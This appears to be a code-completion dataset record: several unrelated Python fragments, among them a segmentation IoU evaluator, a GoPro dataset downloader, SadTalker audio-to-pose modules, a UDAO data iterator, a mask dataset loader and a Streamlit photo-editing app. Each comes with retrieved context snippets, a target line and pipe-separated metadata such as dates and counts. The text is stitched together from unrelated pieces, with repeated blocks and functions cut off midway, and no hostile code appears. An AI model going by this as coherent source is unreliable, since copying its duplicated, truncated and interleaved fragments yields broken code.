from .evaluator import DatasetEvaluator
from calibrate.utils.constants import EPS | 973 |
logger = logging.getLogger(__name__)
def intersect_and_union(pred_label, label, num_classes, ignore_index):
mask = (label != ignore_index)
pred_label = pred_label[mask]
label = label[mask]
intersect = pred_label[pred_label == label]
area_intersect, _ = np.histogram(
intersect, bins=np.arange(num_classes + 1)
)
area_pred_label, _ = np.histogram(
pred_label, bins=np.arange(num_classes + 1)
)
area_label, _ = np.histogram(
label, bins=np.arange(num_classes + 1)
)
area_union = area_pred_label + area_label - area_intersect
return area_intersect, area_union, area_pred_label, area_label
class SegmentEvaluator(DatasetEvaluator):
def __init__(self,
classes: Optional[List[str]] = None,
ignore_index: int = -1) -> None:
super().__init__()
self.classes = classes
self.num_classes = len(self.classes)
self.ignore_index = ignore_index
def num_samples(self):
return self.nsamples
def reset(self):
self.total_area_inter = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_union = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_pred = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_target = np.zeros((self.num_classes, ), dtype=np.float)
self.nsamples = 0
def main_metric(self):
return "miou"
def ignore_background(self, pred: np.ndarray, target: np.ndarray):
pred = pred[:, 1:] if pred.shape[1] > 1 else pred
target = target[:, 1:] if target.shape[1] > 1 else target
return pred, target
def update(self, pred: np.ndarray, target: np.ndarray):
"""Update all the metric from batch size prediction and target.
Args:
pred: predictions to be evaluated in one-hot formation
y: ground truth. It should be one-hot format.
"""
assert pred.shape == target.shape, "pred and target should have same shapes"
n = pred.shape[0]
self.nsamples += n
batch_area_inter = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_union = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_pred = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_target = np.zeros((self.num_classes, ), dtype=np.float)
for i in range(n):
area_inter, area_union, area_pred, area_target = (
intersect_and_union(
pred[i], target[i], self.num_classes, self.ignore_index
)
)
batch_area_inter += area_inter
batch_area_union += area_union
batch_area_pred += area_pred
batch_area_target += area_target
|
logger = logging.getLogger(__name__)
def intersect_and_union(pred_label, label, num_classes, ignore_index):
mask = (label != ignore_index)
pred_label = pred_label[mask]
label = label[mask]
intersect = pred_label[pred_label == label]
area_intersect, _ = np.histogram(
intersect, bins=np.arange(num_classes + 1)
)
area_pred_label, _ = np.histogram(
pred_label, bins=np.arange(num_classes + 1)
)
area_label, _ = np.histogram(
label, bins=np.arange(num_classes + 1)
)
area_union = area_pred_label + area_label - area_intersect
return area_intersect, area_union, area_pred_label, area_label
class SegmentEvaluator(DatasetEvaluator):
def __init__(self,
classes: Optional[List[str]] = None,
ignore_index: int = -1) -> None:
super().__init__()
self.classes = classes
self.num_classes = len(self.classes)
self.ignore_index = ignore_index
def num_samples(self):
return self.nsamples
def reset(self):
self.total_area_inter = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_union = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_pred = np.zeros((self.num_classes, ), dtype=np.float)
self.total_area_target = np.zeros((self.num_classes, ), dtype=np.float)
self.nsamples = 0
def main_metric(self):
return "miou"
def ignore_background(self, pred: np.ndarray, target: np.ndarray):
pred = pred[:, 1:] if pred.shape[1] > 1 else pred
target = target[:, 1:] if target.shape[1] > 1 else target
return pred, target
def update(self, pred: np.ndarray, target: np.ndarray):
"""Update all the metric from batch size prediction and target.
Args:
pred: predictions to be evaluated in one-hot formation
y: ground truth. It should be one-hot format.
"""
assert pred.shape == target.shape, "pred and target should have same shapes"
n = pred.shape[0]
self.nsamples += n
batch_area_inter = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_union = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_pred = np.zeros((self.num_classes, ), dtype=np.float)
batch_area_target = np.zeros((self.num_classes, ), dtype=np.float)
for i in range(n):
area_inter, area_union, area_pred, area_target = (
intersect_and_union(
pred[i], target[i], self.num_classes, self.ignore_index
)
)
batch_area_inter += area_inter
batch_area_union += area_union
batch_area_pred += area_pred
batch_area_target += area_target
| iou = batch_area_inter[1:].sum() / (batch_area_union[1:].sum() + EPS) | 1 | 2023-12-17 13:53:18+00:00 | 2k |
CaptainCook4D/downloader | download_gopro_data.py | [
{
"identifier": "prepare_gopro_2d_output_directory",
"path": "util.py",
"snippet": "def prepare_gopro_2d_output_directory(args, output_dir: Path):\n\toutput_dir.mkdir(parents=True, exist_ok=True)\n\t\n\tdata_directory = output_dir / Constants.CAPTAIN_COOK_4D\n\tdata_directory.mkdir(parents=True, exist_ok=True)\n\t\n\tgopro_data_directory = data_directory / Constants.GOPRO\n\tgopro_data_directory.mkdir(parents=True, exist_ok=True)\n\t\n\tif args.resolution4K:\n\t\tresolution_4K_directory = gopro_data_directory / Constants.RESOLUTION_4K\n\t\tresolution_4K_directory.mkdir(parents=True, exist_ok=True)\n\t\n\tresolution_360p_directory = gopro_data_directory / Constants.RESOLUTION_360P\n\tresolution_360p_directory.mkdir(parents=True, exist_ok=True)\n\t\n\treturn data_directory"
},
{
"identifier": "Constants",
"path": "util.py",
"snippet": "class Constants:\n\tCAPTAIN_COOK_4D = \"captain_cook_4d\"\n\t\n\tGOPRO = \"gopro\"\n\tHOLOLENS = \"hololens\"\n\tGOPRO_RESOLUTION_4K = \"gopro_4k\"\n\tGOPRO_RESOLUTION_360P = \"gopro_360p\"\n\t\n\tDATA_2D = \"data_2d\"\n\tRESOLUTION_360P = \"resolution_360p\"\n\tRESOLUTION_4K = \"resolution_4k\"\n\t\n\tRAW = \"raw\"\n\tSYNC = \"sync\"\n\t\n\tSPATIAL = \"spatial\"\n\t\n\tPV = \"pv\"\n\tMC = \"mc\"\n\t\n\tAB_ZIP = \"ab.zip\"\n\tDEPTH_ZIP = \"depth.zip\"\n\tFRAMES_ZIP = \"frames.zip\"\n\t\n\tDEPTH_AHAT = \"depth_ahat\"\n\tDEPTH = \"depth\"\n\tAB = \"ab\"\n\t\n\tDEPTH_POSE = \"depth_pose\"\n\tPV_POSE = \"pv_pose\"\n\tSPATIAL_POSE = \"spatial_pose\"\n\t\n\tIMU = \"imu\"\n\tDEPTH_POSE_PKL = \"depth_pose_pkl\"\n\tPV_POSE_PKL = \"pv_pose_pkl\"\n\tSPATIAL_POSE_PKL = \"spatial_pkl\"\n\t\n\tIMU_MAGNETOMETER = \"imu_magnetometer\"\n\tIMU_GYROSCOPE = \"imu_gyroscope\"\n\tIMU_ACCELEROMETER = \"imu_accelerometer\"\n\t\n\tIMU_ACCELEROMETER_PKL = \"imu_accelerometer_pkl\"\n\tIMU_GYROSCOPE_PKL = \"imu_gyroscope_pkl\"\n\tIMU_MAGNETOMETER_PKL = \"imu_magnetometer_pkl\"\n\t\n\tIS_HOLOLENS_ENABLED = \"is_hololens_enabled\"\n\tIS_SPATIAL_ENABLED = \"is_spatial_enabled\"\n\t\n\tDATA_JSON = \"data_json\"\n\t\n\tHOLOLENS_DEVICE_INFO = \"hololens_device_info\"\n\t\n\tRECORDING_ID = \"recording_id\"\n\tMETADATA = \"metadata\"\n\tDOWNLOAD_LINKS = \"download_links\"\n\tFILE_SIZES = \"file_sizes\"\n\tRECORDING = \"recording\"\n\t\n\tHOLOLENS_RAW_PV_FRAMES_ZIP = \"hololens_raw_pv_frames_zip\"\n\tHOLOLENS_RAW_DEPTH_AHAT_AB_ZIP = \"hololens_raw_depth_ahat_ab_zip\"\n\tHOLOLENS_RAW_DEPTH_AHAT_DEPTH_ZIP = \"hololens_raw_depth_ahat_depth_zip\"\n\tHOLOLENS_RAW_MC_PKL = \"hololens_raw_mc_pkl\"\n\t\n\tHOLOLENS_SYNC_PV_FRAMES_ZIP = \"hololens_sync_pv_frames_zip\"\n\tHOLOLENS_SYNC_DEPTH_AHAT_AB_ZIP = \"hololens_sync_depth_ahat_ab_zip\"\n\tHOLOLENS_SYNC_DEPTH_AHAT_DEPTH_ZIP = \"hololens_sync_depth_ahat_depth_zip\"\n\tHOLOLENS_SYNC_PV_VIDEO = \"hololens_sync_pv_video\"\n\t\n\tHOLOLENS_RAW_SPATIAL_PKL = \"hololens_raw_spatial_pkl\"\n\tHOLOLENS_RAW_IMU_MAGNETOMETER_PKL = \"hololens_raw_imu_magnetometer_pkl\"\n\tHOLOLENS_RAW_IMU_GYROSCOPE_PKL = \"hololens_raw_imu_gyroscope_pkl\"\n\tHOLOLENS_RAW_IMU_ACCELEROMETER_PKL = \"hololens_raw_imu_accelerometer_pkl\"\n\t\n\tHOLOLENS_SYNC_SPATIAL_PKL = \"hololens_sync_spatial_pkl\"\n\tHOLOLENS_SYNC_IMU_MAGNETOMETER_PKL = \"hololens_sync_imu_magnetometer_pkl\"\n\tHOLOLENS_SYNC_IMU_GYROSCOPE_PKL = \"hololens_sync_imu_gyroscope_pkl\"\n\tHOLOLENS_SYNC_IMU_ACCELEROMETER_PKL = \"hololens_sync_imu_accelerometer_pkl\"\n\t\n\tHOLOLENS_RAW_PV_POSE_PKL = \"hololens_raw_pv_pose_pkl\"\n\tHOLOLENS_SYNC_PV_POSE_PKL = \"hololens_sync_pv_pose_pkl\"\n\t\n\tHOLOLENS_RAW_DEPTH_POSE_PKL = \"hololens_raw_depth_pose_pkl\"\n\tHOLOLENS_SYNC_DEPTH_POSE_PKL = \"hololens_sync_depth_pose_pkl\"\n\t\n\tDURATION = \"duration\""
},
{
"identifier": "download_data",
"path": "util.py",
"snippet": "def download_data(download_url_links, download_file_paths):\n\t# ---- DON'T INCREASE MAX_WORKERS, ELSE DOWNLOAD WILL BE INTERRUPTED ----\n\twith ThreadPoolExecutor(max_workers=3) as executor:\n\t\tresults = list(\n\t\t\ttqdm(\n\t\t\t\texecutor.map(\n\t\t\t\t\tdownload_url,\n\t\t\t\t\tzip(download_url_links, download_file_paths)\n\t\t\t\t),\n\t\t\t\ttotal=len(download_url_links)\n\t\t\t)\n\t\t)\n\treturn results"
}
] | import argparse
import json
from pathlib import Path
from util import prepare_gopro_2d_output_directory, Constants, download_data | 1,527 |
def process_download_gopro_data(download_args):
# ---- Parse Download Links Json ----
with open("metadata/download_links.json", "r") as f:
download_links = json.load(f)
output_dir = Path(download_args.output_dir)
|
def process_download_gopro_data(download_args):
# ---- Parse Download Links Json ----
with open("metadata/download_links.json", "r") as f:
download_links = json.load(f)
output_dir = Path(download_args.output_dir) | data_directory = prepare_gopro_2d_output_directory(download_args, output_dir) | 0 | 2023-12-16 00:27:29+00:00 | 2k |
mjavadpur/Sadtalker_LongVideos | src/audio2pose_models/audio2pose.py | [
{
"identifier": "CVAE",
"path": "src/audio2pose_models/cvae.py",
"snippet": "class CVAE(nn.Module):\n def __init__(self, cfg):\n super().__init__()\n encoder_layer_sizes = cfg.MODEL.CVAE.ENCODER_LAYER_SIZES\n decoder_layer_sizes = cfg.MODEL.CVAE.DECODER_LAYER_SIZES\n latent_size = cfg.MODEL.CVAE.LATENT_SIZE\n num_classes = cfg.DATASET.NUM_CLASSES\n audio_emb_in_size = cfg.MODEL.CVAE.AUDIO_EMB_IN_SIZE\n audio_emb_out_size = cfg.MODEL.CVAE.AUDIO_EMB_OUT_SIZE\n seq_len = cfg.MODEL.CVAE.SEQ_LEN\n\n self.latent_size = latent_size\n\n self.encoder = ENCODER(encoder_layer_sizes, latent_size, num_classes,\n audio_emb_in_size, audio_emb_out_size, seq_len)\n self.decoder = DECODER(decoder_layer_sizes, latent_size, num_classes,\n audio_emb_in_size, audio_emb_out_size, seq_len)\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5 * logvar)\n eps = torch.randn_like(std)\n return mu + eps * std\n\n def forward(self, batch):\n batch = self.encoder(batch)\n mu = batch['mu']\n logvar = batch['logvar']\n z = self.reparameterize(mu, logvar)\n batch['z'] = z\n return self.decoder(batch)\n\n def test(self, batch):\n '''\n class_id = batch['class']\n z = torch.randn([class_id.size(0), self.latent_size]).to(class_id.device)\n batch['z'] = z\n '''\n return self.decoder(batch)"
},
{
"identifier": "PoseSequenceDiscriminator",
"path": "src/audio2pose_models/discriminator.py",
"snippet": "class PoseSequenceDiscriminator(nn.Module):\n def __init__(self, cfg):\n super().__init__()\n self.cfg = cfg\n leaky = self.cfg.MODEL.DISCRIMINATOR.LEAKY_RELU\n\n self.seq = nn.Sequential(\n ConvNormRelu('1d', cfg.MODEL.DISCRIMINATOR.INPUT_CHANNELS, 256, downsample=True, leaky=leaky), # B, 256, 64\n ConvNormRelu('1d', 256, 512, downsample=True, leaky=leaky), # B, 512, 32\n ConvNormRelu('1d', 512, 1024, kernel_size=3, stride=1, padding=1, leaky=leaky), # B, 1024, 16\n nn.Conv1d(1024, 1, kernel_size=3, stride=1, padding=1, bias=True) # B, 1, 16\n )\n\n def forward(self, x):\n x = x.reshape(x.size(0), x.size(1), -1).transpose(1, 2)\n x = self.seq(x)\n x = x.squeeze(1)\n return x"
},
{
"identifier": "AudioEncoder",
"path": "src/audio2pose_models/audio_encoder.py",
"snippet": "class AudioEncoder(nn.Module):\n def __init__(self, wav2lip_checkpoint, device):\n super(AudioEncoder, self).__init__()\n\n self.audio_encoder = nn.Sequential(\n Conv2d(1, 32, kernel_size=3, stride=1, padding=1),\n Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(32, 32, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(32, 64, kernel_size=3, stride=(3, 1), padding=1),\n Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(64, 64, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(64, 128, kernel_size=3, stride=3, padding=1),\n Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(128, 128, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(128, 256, kernel_size=3, stride=(3, 2), padding=1),\n Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(256, 512, kernel_size=3, stride=1, padding=0),\n Conv2d(512, 512, kernel_size=1, stride=1, padding=0),)\n\n #### load the pre-trained audio_encoder, we do not need to load wav2lip model here.\n # wav2lip_state_dict = torch.load(wav2lip_checkpoint, map_location=torch.device(device))['state_dict']\n # state_dict = self.audio_encoder.state_dict()\n\n # for k,v in wav2lip_state_dict.items():\n # if 'audio_encoder' in k:\n # state_dict[k.replace('module.audio_encoder.', '')] = v\n # self.audio_encoder.load_state_dict(state_dict)\n\n\n def forward(self, audio_sequences):\n # audio_sequences = (B, T, 1, 80, 16)\n B = audio_sequences.size(0)\n\n audio_sequences = torch.cat([audio_sequences[:, i] for i in range(audio_sequences.size(1))], dim=0)\n\n audio_embedding = self.audio_encoder(audio_sequences) # B, 512, 1, 1\n dim = audio_embedding.shape[1]\n audio_embedding = audio_embedding.reshape((B, -1, dim, 1, 1))\n\n return audio_embedding.squeeze(-1).squeeze(-1) #B seq_len+1 512 "
}
] | import torch
from torch import nn
from src.audio2pose_models.cvae import CVAE
from src.audio2pose_models.discriminator import PoseSequenceDiscriminator
from src.audio2pose_models.audio_encoder import AudioEncoder | 1,566 |
class Audio2Pose(nn.Module):
def __init__(self, cfg, wav2lip_checkpoint, device='cuda'):
super().__init__()
self.cfg = cfg
self.seq_len = cfg.MODEL.CVAE.SEQ_LEN
self.latent_dim = cfg.MODEL.CVAE.LATENT_SIZE
self.device = device
self.audio_encoder = AudioEncoder(wav2lip_checkpoint, device)
self.audio_encoder.eval()
for param in self.audio_encoder.parameters():
param.requires_grad = False
self.netG = CVAE(cfg)
|
class Audio2Pose(nn.Module):
def __init__(self, cfg, wav2lip_checkpoint, device='cuda'):
super().__init__()
self.cfg = cfg
self.seq_len = cfg.MODEL.CVAE.SEQ_LEN
self.latent_dim = cfg.MODEL.CVAE.LATENT_SIZE
self.device = device
self.audio_encoder = AudioEncoder(wav2lip_checkpoint, device)
self.audio_encoder.eval()
for param in self.audio_encoder.parameters():
param.requires_grad = False
self.netG = CVAE(cfg) | self.netD_motion = PoseSequenceDiscriminator(cfg) | 1 | 2023-12-19 11:01:35+00:00 | 2k |
Angryrou/udao | udao/data/tests/iterators/dummy_udao_iterator.py | [
{
"identifier": "TabularContainer",
"path": "udao/data/containers/tabular_container.py",
"snippet": "class TabularContainer(BaseContainer):\n \"\"\"Container for tabular data, stored in DataFrame format.\"\"\"\n\n data: pd.DataFrame\n\n def get(self, key: str) -> np.ndarray:\n return self.data.loc[key].values # type: ignore"
},
{
"identifier": "UdaoIterator",
"path": "udao/data/iterators/base_iterator.py",
"snippet": "class UdaoIterator(BaseIterator[Tuple[UT, th.Tensor], UST], Generic[UT, UST]):\n \"\"\"Base iterator for the Udao use case, where the iterator\n returns a FeatureInput object. It is expected to accept:\n - a TabularContainer representing the tabular features\n which can be set as variables by the user in the optimization pipeline\n - a TabularContainer representing the objectives\n\n FST: Type of the iterator output shape - in the Udao case,\n restricted to FeatureInputShape and its subclasses.\n\n FT: Type of the iterator output - in the Udao case,\n restricted to th.Tensor and its subclasses\n This results in a type Tuple[UT, th.Tensor] for the iterator output.\n\n Parameters\n ----------\n keys : Sequence[str]\n Keys of the dataset, used for accessing all features\n tabular_features : TabularContainer\n Tabular features of the iterator\n objectives : TabularContainer\n Objectives of the iterator\n \"\"\"\n\n def __init__(\n self,\n keys: Sequence[str],\n tabular_features: TabularContainer,\n objectives: TabularContainer,\n ) -> None:\n super().__init__(keys)\n self.tabular_features = tabular_features\n self.objectives = objectives\n\n def get_tabular_features_container(\n self, feature_input: th.Tensor\n ) -> TabularContainer:\n indices = [\n i\n for i, name in enumerate(self.shape.feature_names)\n if name in self.tabular_features.data.columns\n ]\n tabular_features = feature_input[:, indices]\n tabular_df = pd.DataFrame(\n tabular_features.cpu().numpy(), columns=self.tabular_features.data.columns\n )\n return TabularContainer(tabular_df)"
},
{
"identifier": "UdaoEmbedInput",
"path": "udao/utils/interfaces.py",
"snippet": "class UdaoEmbedInput(Generic[T], UdaoInput):\n embedding_input: T\n\n def to(self, device: th.device) -> \"UdaoEmbedInput\":\n if hasattr(self.embedding_input, \"to\"):\n return UdaoEmbedInput(\n self.embedding_input.to(device), self.features.to(device) # type: ignore\n )\n else:\n return UdaoEmbedInput(\n self.embedding_input, self.features.to(device) # type: ignore\n )"
},
{
"identifier": "UdaoEmbedItemShape",
"path": "udao/utils/interfaces.py",
"snippet": "class UdaoEmbedItemShape(Generic[ST], UdaoItemShape):\n embedding_input_shape: ST"
},
{
"identifier": "UdaoInput",
"path": "udao/utils/interfaces.py",
"snippet": "class UdaoInput:\n features: th.Tensor\n\n def to(self, device: th.device) -> \"UdaoInput\":\n return UdaoInput(self.features.to(device))"
},
{
"identifier": "UdaoItemShape",
"path": "udao/utils/interfaces.py",
"snippet": "class UdaoItemShape:\n feature_names: list[str]\n output_names: list[str]"
}
] | from typing import Sequence, Tuple
from ....data.containers.tabular_container import TabularContainer
from ....data.iterators.base_iterator import UdaoIterator
from ....utils.interfaces import (
UdaoEmbedInput,
UdaoEmbedItemShape,
UdaoInput,
UdaoItemShape,
)
import torch as th | 1,099 |
class DummyUdaoIterator(UdaoIterator[UdaoInput, UdaoItemShape]):
def __init__(
self,
keys: Sequence[str],
tabular_features: TabularContainer,
objectives: TabularContainer,
) -> None:
super().__init__(keys, tabular_features=tabular_features, objectives=objectives)
def _getitem(self, idx: int) -> Tuple[UdaoInput, th.Tensor]:
key = self.keys[idx]
return (
UdaoInput(
th.tensor(self.tabular_features.get(key), dtype=self.tensors_dtype)
),
th.tensor(self.objectives.get(key), dtype=self.tensors_dtype),
)
@property
def shape(self) -> UdaoItemShape:
return UdaoItemShape(
feature_names=list(self.tabular_features.data.columns),
output_names=list(self.objectives.data.columns),
)
@staticmethod
def collate(
items: Sequence[Tuple[UdaoInput, th.Tensor]]
) -> Tuple[UdaoInput, th.Tensor]:
features = UdaoInput(th.vstack([item[0].features for item in items]))
objectives = th.vstack([item[1] for item in items])
return features, objectives
|
class DummyUdaoIterator(UdaoIterator[UdaoInput, UdaoItemShape]):
def __init__(
self,
keys: Sequence[str],
tabular_features: TabularContainer,
objectives: TabularContainer,
) -> None:
super().__init__(keys, tabular_features=tabular_features, objectives=objectives)
def _getitem(self, idx: int) -> Tuple[UdaoInput, th.Tensor]:
key = self.keys[idx]
return (
UdaoInput(
th.tensor(self.tabular_features.get(key), dtype=self.tensors_dtype)
),
th.tensor(self.objectives.get(key), dtype=self.tensors_dtype),
)
@property
def shape(self) -> UdaoItemShape:
return UdaoItemShape(
feature_names=list(self.tabular_features.data.columns),
output_names=list(self.objectives.data.columns),
)
@staticmethod
def collate(
items: Sequence[Tuple[UdaoInput, th.Tensor]]
) -> Tuple[UdaoInput, th.Tensor]:
features = UdaoInput(th.vstack([item[0].features for item in items]))
objectives = th.vstack([item[1] for item in items])
return features, objectives
| class DummyUdaoEmbedIterator(UdaoIterator[UdaoEmbedInput, UdaoEmbedItemShape]): | 3 | 2023-12-20 09:10:42+00:00 | 2k |
SnailForce/SIM-Net | data/mask_dataset.py | [
{
"identifier": "BaseDataset",
"path": "data/base_dataset.py",
"snippet": "class BaseDataset(data.Dataset, ABC):\n \"\"\"This class is an abstract base class (ABC) for datasets.\n\n To create a subclass, you need to implement the following four functions:\n -- <__init__>: initialize the class, first call BaseDataset.__init__(self, opt).\n -- <__len__>: return the size of dataset.\n -- <__getitem__>: get a data point.\n -- <modify_commandline_options>: (optionally) add dataset-specific options and set default options.\n \"\"\"\n\n def __init__(self, opt):\n \"\"\"Initialize the class; save the options in the class\n\n Parameters:\n opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions\n \"\"\"\n self.opt = opt\n self.root = opt.dataroot\n\n @staticmethod\n def modify_commandline_options(parser, is_train):\n \"\"\"Add new dataset-specific options, and rewrite default values for existing options.\n\n Parameters:\n parser -- original option parser\n is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.\n\n Returns:\n the modified parser.\n \"\"\"\n return parser\n\n @abstractmethod\n def __len__(self):\n \"\"\"Return the total number of images in the dataset.\"\"\"\n return 0\n\n @abstractmethod\n def __getitem__(self, index):\n \"\"\"Return a data point and its metadata information.\n\n Parameters:\n index - - a random integer for data indexing\n\n Returns:\n a dictionary of data with their names. It ususally contains the data itself and its metadata information.\n \"\"\"\n pass"
},
{
"identifier": "get_transform",
"path": "data/base_dataset.py",
"snippet": "def get_transform(opt, params=None, grayscale=False, method=Image.BICUBIC, convert=True):\n transform_list = []\n if grayscale:\n transform_list.append(transforms.Grayscale(1))\n if 'resize' in opt.preprocess:\n osize = [opt.load_size, opt.load_size]\n transform_list.append(transforms.Resize(osize, method))\n elif 'scale_width' in opt.preprocess:\n transform_list.append(transforms.Lambda(lambda img: __scale_width(img, opt.load_size, opt.crop_size, method)))\n\n if 'crop' in opt.preprocess:\n if params is None:\n transform_list.append(transforms.RandomCrop(opt.crop_size))\n else:\n transform_list.append(transforms.Lambda(lambda img: __crop(img, params['crop_pos'], opt.crop_size)))\n\n if opt.preprocess == 'none':\n transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base=4, method=method)))\n\n if not opt.no_flip:\n if params is None:\n transform_list.append(transforms.RandomHorizontalFlip())\n elif params['flip']:\n transform_list.append(transforms.Lambda(lambda img: __flip(img, params['flip'])))\n\n if convert:\n transform_list += [transforms.ToTensor()]\n # if grayscale:\n # transform_list += [transforms.Normalize((0.5,), (0.5,))]\n # else:\n # transform_list += [transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n return transforms.Compose(transform_list)"
},
{
"identifier": "make_dataset_by_name",
"path": "data/image_folder.py",
"snippet": "def make_dataset_by_name(dir, max_dataset_size=float(\"inf\")):\n images = []\n assert os.path.isdir(dir), '%s is not a valid directory' % dir\n\n for root, _, fnames in sorted(os.walk(dir)):\n for fname in fnames:\n if is_image_file(fname):\n # path = os.path.join(root, fname)\n images.append(fname)\n return images[:min(max_dataset_size, len(images))]"
}
] | import os,yaml
import torch.nn.functional as F
import random
import numpy as np
import collections
import torch
from data.base_dataset import BaseDataset, get_transform
from data.image_folder import make_dataset_by_name
from PIL import Image,ImageFilter | 1,213 |
class MaskDataset(BaseDataset):
def __init__(self, opt):
"""Initialize this dataset class.
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseDataset.__init__(self, opt)
self.root_dir = os.path.join(opt.dataroot,'class')
self.phase = opt.phase
self.img_mask_dict = {}
self.img_names = {}
self.data_size = {}
self.label_list = os.listdir(os.path.join(self.root_dir))
# The shape of the human face is more complex, so increase the training ratio
if "face" in self.label_list:
self.label_list.append("face")
for label in self.label_list:
label_dir = os.path.join(self.root_dir,label,"images")
with open(os.path.join(self.root_dir,label,'list.yaml')) as f:
self.img_mask_dict[label] = yaml.safe_load(f)
self.img_names[label] = list(self.img_mask_dict[label].keys())
self.data_size[label] = len(self.img_names[label])
|
class MaskDataset(BaseDataset):
def __init__(self, opt):
"""Initialize this dataset class.
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseDataset.__init__(self, opt)
self.root_dir = os.path.join(opt.dataroot,'class')
self.phase = opt.phase
self.img_mask_dict = {}
self.img_names = {}
self.data_size = {}
self.label_list = os.listdir(os.path.join(self.root_dir))
# The shape of the human face is more complex, so increase the training ratio
if "face" in self.label_list:
self.label_list.append("face")
for label in self.label_list:
label_dir = os.path.join(self.root_dir,label,"images")
with open(os.path.join(self.root_dir,label,'list.yaml')) as f:
self.img_mask_dict[label] = yaml.safe_load(f)
self.img_names[label] = list(self.img_mask_dict[label].keys())
self.data_size[label] = len(self.img_names[label]) | self.transform = get_transform(self.opt) | 1 | 2023-12-16 12:49:10+00:00 | 2k |
adarshsankarrs/PhotoshopApp | app.py | [
{
"identifier": "MultiApp",
"path": "multiapp.py",
"snippet": "class MultiApp:\n \"\"\"Framework for combining multiple streamlit applications.\n \"\"\"\n def __init__(self):\n self.apps = []\n\n def add_app(self, title, func):\n \"\"\"Adds a new application.\n\n \"\"\"\n self.apps.append({\n \"title\": title,\n \"function\": func\n })\n\n def run(self):\n # app = st.sidebar.radio(\n app = st.sidebar.selectbox(\n 'Select from the options',\n self.apps,\n format_func=lambda app: app['title'])\n\n app['function']()"
},
{
"identifier": "home",
"path": "apps/home.py",
"snippet": "def app():"
},
{
"identifier": "sketch",
"path": "apps/sketch.py",
"snippet": "DEMO_IMAGE = 'imgs/Tiger.jpg'\ndef app():\n def img2sketch(photo, k_size):"
},
{
"identifier": "inpaint",
"path": "apps/inpaint.py",
"snippet": "def app():\n def inpaintt(img,mask):\n DEMO_IMAGE = 'imgs/impai.png'\n DEMO_IMAGE_MASK = 'imgs/maskn.png'"
},
{
"identifier": "stadap",
"path": "apps/stadap.py",
"snippet": "def app():\n def adap(img):\n DEMO_IMAGE = 'imgs/scannedimg.jpeg'"
},
{
"identifier": "textonimg",
"path": "apps/textonimg.py",
"snippet": "DEMO_IMAGE = 'imgs/Tiger.jpg'\ndef app():\n def imgtext(photo, text):"
},
{
"identifier": "Edge_Cont",
"path": "apps/Edge_Cont.py",
"snippet": "def app():\r\n def load_image(filename):\r\n def photo():\r\n DEMO_IMAGE = 'imgs/Tiger.jpg'\r"
},
{
"identifier": "Face_detect",
"path": "apps/Face_detect.py",
"snippet": "def app():\r\n def face_detection():\r\n DEMO_IMAGE = 'imgs/Person.jpg'\r"
},
{
"identifier": "Crop",
"path": "apps/Crop.py",
"snippet": "def app():\r"
},
{
"identifier": "filters",
"path": "apps/filters.py",
"snippet": "def app():\r\n def load_image():\r\n def img2bright(photo):\r\n def img2enh(photo):\r\n def img2inv(photo):\r\n def gamma_function1(channel, gamma):\r\n def img2sum(photo):\r\n def gamma_function2(channel, gamma):\r\n def img2win(photo):\r\n def img2sepia(photo):\r\n def hsv(img, l, u):\r\n def img2splash(photo):\r\n def img2cont(photo):\r\n def img2emb(photo):\r\n def tv_60(photo):\r\n def img2cartoon(photo):\r\n def img2sketch(photo, k_size):\r\n def exponential_function(channel, exp):\r\n def img2tone(img, number):\r\n def img2day(photo):\r\n def img2pen(photo):\r\n def comic(photo):\r\n DEMO_IMAGE = 'imgs/Tiger.jpg'\r\n SP_DEMO_IMAGE = 'imgs/ball.jpg'\r\n SP_IMAGE = 'imgs/Splash.jpg' \r"
},
{
"identifier": "abtus",
"path": "apps/abtus.py",
"snippet": "def app():"
},
{
"identifier": "Feature_detect",
"path": "apps/Feature_detect.py",
"snippet": "DEMO_IMAGE = 'imgs/Person.jpg'\r\ndef app():\r\n def load_image():\r\n def feature_detection():\r"
}
] | import streamlit as st
import numpy as np
import pandas as pd
import cv2
from PIL import Image, ImageOps
from multiapp import MultiApp
from apps import home,sketch,inpaint,stadap,textonimg,Edge_Cont,Face_detect,Crop,filters,abtus,Feature_detect | 928 | app = MultiApp()
# option = st.selectbox(
# 'Select from the options',
# ('Home', 'Filters', 'Doc scanner','add text'), key = 1)
# if(option=='Filters'):
# opt = st.selectbox(
# 'Select from the options',
# ('sepia', 'Filter1', 'filter2','filter3'), key = 2)
# Add all your application here
app.add_app("Home", home.app)
app.add_app("Add filters to image", filters.app)
app.add_app("Sketch", sketch.app)
app.add_app("Image inpainting", inpaint.app)
app.add_app("Doc Scanner", stadap.app)
app.add_app("Add Title to image", textonimg.app)
app.add_app("Crop an Image", Crop.app)
app.add_app("Edge and Contour detection ", Edge_Cont.app)
| app = MultiApp()
# option = st.selectbox(
# 'Select from the options',
# ('Home', 'Filters', 'Doc scanner','add text'), key = 1)
# if(option=='Filters'):
# opt = st.selectbox(
# 'Select from the options',
# ('sepia', 'Filter1', 'filter2','filter3'), key = 2)
# Add all your application here
app.add_app("Home", home.app)
app.add_app("Add filters to image", filters.app)
app.add_app("Sketch", sketch.app)
